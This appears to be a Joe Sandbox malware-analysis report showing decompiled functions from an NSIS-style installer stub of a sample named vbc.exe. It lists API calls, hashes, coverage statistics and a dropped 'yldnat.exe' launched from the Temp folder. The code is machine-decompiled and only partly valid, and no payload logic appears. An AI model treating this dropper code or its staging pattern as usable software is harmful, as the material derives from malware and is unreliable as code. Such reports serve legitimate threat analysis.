                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: CloseEnum$DeleteValue
                                                        • String ID:
                                                        • API String ID: 1354259210-0
                                                        • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                        • Instruction ID: e84adf69fee3246f56ef13a6fd4e717e0861f51d99737fac189c4d1833cff19f
                                                        • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                        • Instruction Fuzzy Hash: 31213B7150010ABBDF11AF90CE89EEF7B7DEB54384F110076F909B21E0D7B59E54AA68
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 77%
                                                        			E00401D81(void* __ebx, void* __edx) {
                                                        				struct HWND__* _t30;
                                                        				WCHAR* _t38;
                                                        				void* _t48;
                                                        				void* _t53;
                                                        				signed int _t55;
                                                        				signed int _t60;
                                                        				long _t63;
                                                        				void* _t65;
                                                        
                                                        				_t53 = __ebx;
                                                        				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                                                        					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                                                        				} else {
                                                        					E00402D84(2);
                                                        					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                                                        				}
                                                        				_t55 =  *(_t65 - 0x24);
                                                        				 *(_t65 + 8) = _t30;
                                                        				_t60 = _t55 & 0x00000004;
                                                        				 *(_t65 - 0x38) = _t55 & 0x00000003;
                                                        				 *(_t65 - 0x18) = _t55 >> 0x1f;
                                                        				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                                                        				if((_t55 & 0x00010000) == 0) {
                                                        					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                                                        				} else {
                                                        					_t38 = E00402DA6(0x11);
                                                        				}
                                                        				 *(_t65 - 0x44) = _t38;
                                                        				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                                                        				asm("sbb esi, esi");
                                                        				_t63 = LoadImageW( ~_t60 &  *0x7a8aa0,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                                                        				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                                                        				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                                                        					DeleteObject(_t48);
                                                        				}
                                                        				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                                                        					_push(_t63);
                                                        					E004065B5();
                                                        				}
                                                        				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t65 - 4));
                                                        				return 0;
                                                        			}











                                                        Instruction addresses (one per decompiled line, in listing order): 0x00401d81, 0x00401d85, 0x00401d9a, 0x00401d87, 0x00401d89, 0x00401d8f, 0x00401d8f, 0x00401da0, 0x00401da3, 0x00401dad, 0x00401db0, 0x00401db8, 0x00401dc9, 0x00401dcc, 0x00401dd7, 0x00401dce, 0x00401dd0, 0x00401dd0, 0x00401ddb, 0x00401de5, 0x00401e0c, 0x00401e1b, 0x00401e29, 0x00401e31, 0x00401e39, 0x00401e39, 0x00401e42, 0x00401e48, 0x00402ba4, 0x00402ba4, 0x00402c2d, 0x00402c39

                                                        APIs
                                                        • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                        • GetClientRect.USER32 ref: 00401DE5
                                                        • LoadImageW.USER32 ref: 00401E15
                                                        • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                        • DeleteObject.GDI32(00000000), ref: 00401E39
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                        • String ID:
                                                        • API String ID: 1849352358-0
                                                        • Opcode ID: f665995d6bdb305172d13ad54de642187c856862005d3c57e5c2f614b82d9191
                                                        • Instruction ID: 474cd979728561ffe20026c9632071baa6ad0bc9fd2f813aa8d1396f3614d648
                                                        • Opcode Fuzzy Hash: f665995d6bdb305172d13ad54de642187c856862005d3c57e5c2f614b82d9191
                                                        • Instruction Fuzzy Hash: DC212672D00119AFCF05CBA4DE45AEEBBB5EF08304F14403AF945F62A0DB389951DB98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 73%
                                                        			E00401E4E(intOrPtr __edx) {
                                                        				void* __edi;
                                                        				int _t9;
                                                        				signed char _t15;
                                                        				struct HFONT__* _t18;
                                                        				intOrPtr _t30;
                                                        				void* _t31;
                                                        				struct HDC__* _t33;
                                                        				void* _t35;
                                                        
                                                        				_t30 = __edx;
                                                        				_t33 = GetDC( *(_t35 - 8));
                                                        				_t9 = E00402D84(2);
                                                        				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                        				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                                                        				ReleaseDC( *(_t35 - 8), _t33);
                                                        				 *0x40ce08 = E00402D84(3);
                                                        				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                                                        				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                        				 *0x40ce0f = 1;
                                                        				 *0x40ce0c = _t15 & 0x00000001;
                                                        				 *0x40ce0d = _t15 & 0x00000002;
                                                        				 *0x40ce0e = _t15 & 0x00000004;
                                                        				E004066AB(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
                                                        				_t18 = CreateFontIndirectW(0x40cdf8);
                                                        				_push(_t18);
                                                        				_push(_t31);
                                                        				E004065B5();
                                                        				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t35 - 4));
                                                        				return 0;
                                                        			}












                                                        APIs
                                                        • GetDC.USER32(?), ref: 00401E51
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                        • MulDiv.KERNEL32 ref: 00401E73
                                                        • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                          • Part of subcall function 004066AB: lstrcatW.KERNEL32 ref: 00406850
                                                          • Part of subcall function 004066AB: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA
                                                        • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                        • String ID:
                                                        • API String ID: 2584051700-0
                                                        • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                        • Instruction ID: c4fbce1732c038d4ae3387388930f25584bd8a0c3a5059ecf0713bcf7412b626
                                                        • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                        • Instruction Fuzzy Hash: 0E01B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 59%
                                                        			E00401C43(intOrPtr __edx) {
                                                        				int _t29;
                                                        				long _t30;
                                                        				signed int _t32;
                                                        				WCHAR* _t35;
                                                        				long _t36;
                                                        				int _t41;
                                                        				signed int _t42;
                                                        				int _t46;
                                                        				int _t56;
                                                        				intOrPtr _t57;
                                                        				struct HWND__* _t63;
                                                        				void* _t64;
                                                        
                                                        				_t57 = __edx;
                                                        				_t29 = E00402D84(3);
                                                        				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                        				 *(_t64 - 0x18) = _t29;
                                                        				_t30 = E00402D84(4);
                                                        				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                        				 *(_t64 + 8) = _t30;
                                                        				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                                                        					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                                                        				}
                                                        				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                                                        				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                                                        					 *(_t64 + 8) = E00402DA6(0x44);
                                                        				}
                                                        				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                                                        				_push(1);
                                                        				if(__eflags != 0) {
                                                        					_t61 = E00402DA6();
                                                        					_t32 = E00402DA6();
                                                        					asm("sbb ecx, ecx");
                                                        					asm("sbb eax, eax");
                                                        					_t35 =  ~( *_t31) & _t61;
                                                        					__eflags = _t35;
                                                        					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                        					goto L10;
                                                        				} else {
                                                        					_t63 = E00402D84();
                                                        					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                        					_t41 = E00402D84(2);
                                                        					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                        					_t56 =  *(_t64 - 0x1c) >> 2;
                                                        					if(__eflags == 0) {
                                                        						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                                                        						L10:
                                                        						 *(_t64 - 0x38) = _t36;
                                                        					} else {
                                                        						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                                                        						asm("sbb eax, eax");
                                                        						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                        					}
                                                        				}
                                                        				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                                                        				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                                                        					_push( *(_t64 - 0x38));
                                                        					E004065B5();
                                                        				}
                                                        				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t64 - 4));
                                                        				return 0;
                                                        			}
















                                                        APIs
                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Timeout
                                                        • String ID: !
                                                        • API String ID: 1777923405-2657877971
                                                        • Opcode ID: a925d33b65f5538ff345f0f48edbd750304bc8babfa6be52d46d5660b496d1e6
                                                        • Instruction ID: a8e9040b9442a73e8ccf438a9e221504da771f110143023329da3593775932a3
                                                        • Opcode Fuzzy Hash: a925d33b65f5538ff345f0f48edbd750304bc8babfa6be52d46d5660b496d1e6
                                                        • Instruction Fuzzy Hash: 2D219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 77%
                                                        			E00404E77(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                        				char _v68;
                                                        				char _v132;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t23;
                                                        				signed int _t24;
                                                        				void* _t31;
                                                        				void* _t33;
                                                        				void* _t34;
                                                        				void* _t44;
                                                        				signed int _t46;
                                                        				signed int _t50;
                                                        				signed int _t52;
                                                        				signed int _t53;
                                                        				signed int _t55;
                                                        
                                                        				_t23 = _a16;
                                                        				_t53 = _a12;
                                                        				_t44 = 0xffffffdc;
                                                        				if(_t23 == 0) {
                                                        					_push(0x14);
                                                        					_pop(0);
                                                        					_t24 = _t53;
                                                        					if(_t53 < 0x100000) {
                                                        						_push(0xa);
                                                        						_pop(0);
                                                        						_t44 = 0xffffffdd;
                                                        					}
                                                        					if(_t53 < 0x400) {
                                                        						_t44 = 0xffffffde;
                                                        					}
                                                        					if(_t53 < 0xffff3333) {
                                                        						_t52 = 0x14;
                                                        						asm("cdq");
                                                        						_t24 = 1 / _t52 + _t53;
                                                        					}
                                                        					_t25 = _t24 & 0x00ffffff;
                                                        					_t55 = _t24 >> 0;
                                                        					_t46 = 0xa;
                                                        					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                                        				} else {
                                                        					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                                        					_t50 = 0;
                                                        				}
                                                        				_t31 = E004066AB(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                                        				_t33 = E004066AB(_t44, _t50, _t55,  &_v132, _t44);
                                                        				_t34 = E004066AB(_t44, _t50, 0x7a1f88, 0x7a1f88, _a8);
                                                        				wsprintfW(_t34 + lstrlenW(0x7a1f88) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                                        				return SetDlgItemTextW( *0x7a7a78, _a4, 0x7a1f88);
                                                        			}




















                                                        APIs
                                                        • lstrlenW.KERNEL32(007A1F88,007A1F88,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F18
                                                        • wsprintfW.USER32 ref: 00404F21
                                                        • SetDlgItemTextW.USER32 ref: 00404F34
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: ItemTextlstrlenwsprintf
                                                        • String ID: %u.%u%s%s
                                                        • API String ID: 3540041739-3551169577
                                                        • Opcode ID: 4298df8fa65d3e63540fdf60f99430adbe5e40f9a8b71c27c1b7671c68856ea4
                                                        • Instruction ID: f4f79be78f3b00f65903d53a5db5cb29a0acdec533a94133042e7cdde7caf59d
                                                        • Opcode Fuzzy Hash: 4298df8fa65d3e63540fdf60f99430adbe5e40f9a8b71c27c1b7671c68856ea4
                                                        • Instruction Fuzzy Hash: 5711D5736041282BDB00A56DDD45E9F3288AB81334F250637FA25F21D1EA79882186E8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 58%
                                                        			E00405F3D(WCHAR* _a4) {
                                                        				WCHAR* _t9;
                                                        
                                                        				_t9 = _a4;
                                                        				_push( &(_t9[lstrlenW(_t9)]));
                                                        				_push(_t9);
                                                        				if( *(CharPrevW()) != 0x5c) {
                                                        					lstrcatW(_t9, 0x40a014);
                                                        				}
                                                        				return _t9;
                                                        			}





                                                        APIs
                                                        • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405F43
                                                        • CharPrevW.USER32(?,00000000), ref: 00405F4D
                                                        • lstrcatW.KERNEL32 ref: 00405F5F
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F3D
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: CharPrevlstrcatlstrlen
                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 2659869361-4017390910
                                                        • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                        • Instruction ID: 4d139d42d978cba7810d0072a9498665e67a0d594e33c17037060be18c5eefd9
                                                        • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                        • Instruction Fuzzy Hash: F6D0A771101A306EC1117B648C04CDF729CEE89344346443BF901B70A0CB7D1D5287FD
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 89%
                                                        			E00405644(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                        				int _t15;
                                                        				long _t16;
                                                        
                                                        				_t15 = _a8;
                                                        				if(_t15 != 0x102) {
                                                        					if(_t15 != 0x200) {
                                                        						_t16 = _a16;
                                                        						L7:
                                                        						if(_t15 == 0x419 &&  *0x7a1f74 != _t16) {
                                                        							_push(_t16);
                                                        							_push(6);
                                                        							 *0x7a1f74 = _t16;
                                                        							E00405005();
                                                        						}
                                                        						L11:
                                                        						return CallWindowProcW( *0x7a1f7c, _a4, _t15, _a12, _t16);
                                                        					}
                                                        					if(IsWindowVisible(_a4) == 0) {
                                                        						L10:
                                                        						_t16 = _a16;
                                                        						goto L11;
                                                        					}
                                                        					_t16 = E00404F85(_a4, 1);
                                                        					_t15 = 0x419;
                                                        					goto L7;
                                                        				}
                                                        				if(_a12 != 0x20) {
                                                        					goto L10;
                                                        				}
                                                        				E00404616(0x413);
                                                        				return 0;
                                                        			}






                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 00405673
                                                        • CallWindowProcW.USER32(?,?,?,?), ref: 004056C4
                                                          • Part of subcall function 00404616: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404628
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: Window$CallMessageProcSendVisible
                                                        • String ID:
                                                        • API String ID: 3748168415-3916222277
                                                        • Opcode ID: 7939219b80a2ac52c1d0d435a37392739a133ef29b28caecab86fe9e557cc681
                                                        • Instruction ID: d595ca740675a0faf81d7ea6a2f5abbfab032377942bf72e797c79c3d66f513a
                                                        • Opcode Fuzzy Hash: 7939219b80a2ac52c1d0d435a37392739a133ef29b28caecab86fe9e557cc681
                                                        • Instruction Fuzzy Hash: B1017131201609AFEF209F21DD80A9B3A26EB85754F904837FA08762D1C77B8D919F6D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 90%
                                                        			E0040653C(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                                        				int _v8;
                                                        				long _t21;
                                                        				long _t24;
                                                        				char* _t30;
                                                        
                                                        				asm("sbb eax, eax");
                                                        				_v8 = 0x800;
                                                        				_t21 = E004064DB(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                                        				_t30 = _a16;
                                                        				if(_t21 != 0) {
                                                        					L4:
                                                        					 *_t30 =  *_t30 & 0x00000000;
                                                        				} else {
                                                        					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                        					_t21 = RegCloseKey(_a20);
                                                        					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                                        					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                        						goto L4;
                                                        					}
                                                        				}
                                                        				return _t21;
                                                        			}








                                                        APIs
                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800), ref: 00406582
                                                        • RegCloseKey.ADVAPI32(?), ref: 0040658D
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna, xrefs: 00406543
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: CloseQueryValue
                                                        • String ID: C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna
                                                        • API String ID: 3356406503-540822073
                                                        • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                        • Instruction ID: 9e12fcea604be09863af9e628fe48d824a74a48827fd48a6b9c69832a92d0d42
                                                        • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                        • Instruction Fuzzy Hash: DA015A72500209FADF218F51DC09EDB3BA8EB54364F01803AFD1AA2190E739D964DBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E004060C3(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                        				int _v8;
                                                        				int _t12;
                                                        				int _t14;
                                                        				int _t15;
                                                        				CHAR* _t17;
                                                        				CHAR* _t27;
                                                        
                                                        				_t12 = lstrlenA(_a8);
                                                        				_t27 = _a4;
                                                        				_v8 = _t12;
                                                        				while(lstrlenA(_t27) >= _v8) {
                                                        					_t14 = _v8;
                                                        					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                        					_t15 = lstrcmpiA(_t27, _a8);
                                                        					_t27[_v8] =  *(_t14 + _t27);
                                                        					if(_t15 == 0) {
                                                        						_t17 = _t27;
                                                        					} else {
                                                        						_t27 = CharNextA(_t27);
                                                        						continue;
                                                        					}
                                                        					L5:
                                                        					return _t17;
                                                        				}
                                                        				_t17 = 0;
                                                        				goto L5;
                                                        			}










                                                        APIs
                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060D3
                                                        • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060EB
                                                        • CharNextA.USER32(00000000), ref: 004060FC
                                                        • lstrlenA.KERNEL32(00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406105
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                        • String ID:
                                                        • API String ID: 190613189-0
                                                        • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                        • Instruction ID: ebd02a31c913037c7252cee765efb5e80e8868db32339617edb9e16a90b2d78f
                                                        • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                        • Instruction Fuzzy Hash: 7CF0F631100054FFDB02DFA5CD40D9EBBA8DF46350B2640BAE841FB311D674DE11ABA8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage: 11.6%
                                                        Dynamic/Decrypted Code Coverage: 5.2%
                                                        Signature Coverage: 7.4%
                                                        Total number of Nodes: 1735
                                                        Total number of Limit Nodes: 105
